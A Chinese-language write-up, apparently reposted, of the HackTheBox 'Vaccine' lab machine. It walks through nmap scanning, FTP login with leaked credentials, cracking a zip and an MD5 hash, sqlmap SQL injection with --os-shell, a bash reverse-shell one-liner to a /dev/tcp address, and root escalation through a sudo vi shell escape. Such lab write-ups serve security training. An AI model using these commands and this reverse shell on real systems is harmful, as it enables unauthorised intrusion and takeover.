HackTheBox-Vaccine

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了HackTheBox-Vaccine相关的知识,希望对你有一定的参考价值。

连接配置

参考之前写的连接配置,文章链接

信息搜集

使用nmap对场景给出的ip地址进行扫描

nmap -sS -A 10.10.10.46 

发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务

登录FTP

ftp 10.10.10.46
Name:ftpuser
Password:mc@F1l3ZilL4

登陆后利用 dir命令列出所有的文件,发现存在 backup.zip 压缩包,利用 get命令下载下来

发现下载下来的 backup.zip 是加密的,尝试利用 Kali 中的 john 来破解压缩包密码

破解压缩包密码

首先生成压缩包的hash值

zip2john backup.zip > hash

利用 Kali 中自带的字典 rockyou.txt,将 rockyou.txt.gz 复制到桌面上并用 gzip解压缩

使用 john来指定字典破解密码

john hash --fork=4 -w rockyou.txt 2>/dev/null
--fork=4:4个进程
-w:指定字典路径
2>/dev/null:将错误输出到黑洞(不显示)

John破解得到压缩包密码:741852963

利用 unzip解压 backup.zip得到 index.php 以及 style.css

获取登录密码

查看 index.php 发现存在 admin账户以及其密码的MD5值

利用网站在线破解一下这串hash值,网站链接,得到密码为:qwerty789

登录网站

利用 admin/qwerty789 登录网站

查看一下网站发现处于右上角的搜索框之外并没有什么利用点,在搜索框随便输入点内容,利用burp suite抓个包将内容保存下来

利用sqlmap进行测试

sqlmap -r Vaccine.txt 

发现确实存在注入点,并且后台数据库为PostgreSQL

getshell

由于是sql注入点,采用 --os-shell 来getshell

先起一个监听

nc -nvvlp 1234

然后在 os-shell 中输入 bash -c 'bash -i >& /dev/tcp/10.10.16.53/1234 0>&1' 来反弹shell

升级shell

将升级 shell 升级为 tty,得到一个交互式的shell

查找文件发现/var/www/html目录下的dashboard.php存在当前用户postgres的密码P@s5w0rd!

提权

验证用户密码查看自己当前的权限

sudo -l

发现用户被允许编辑配置文件 /etc/postgresql/11/main/pg_hba.conf,可以利用vi并验证密码提权至root
进入vi界面后可能会界面重叠,直接输入:!/bin/bash再点击回车即可,输入whoami发现已经成功提权为root

进入/root目录下,查看 root.txt 文件,即可拿到SYSTEM OWN的Flag

以上是关于HackTheBox-Vaccine的主要内容,如果未能解决你的问题,请参考以下文章

微信小程序代码片段

VSCode自定义代码片段——CSS选择器

谷歌浏览器调试jsp 引入代码片段,如何调试代码片段中的js

片段和活动之间的核心区别是啥?哪些代码可以写成片段?

VSCode自定义代码片段——.vue文件的模板

VSCode自定义代码片段6——CSS选择器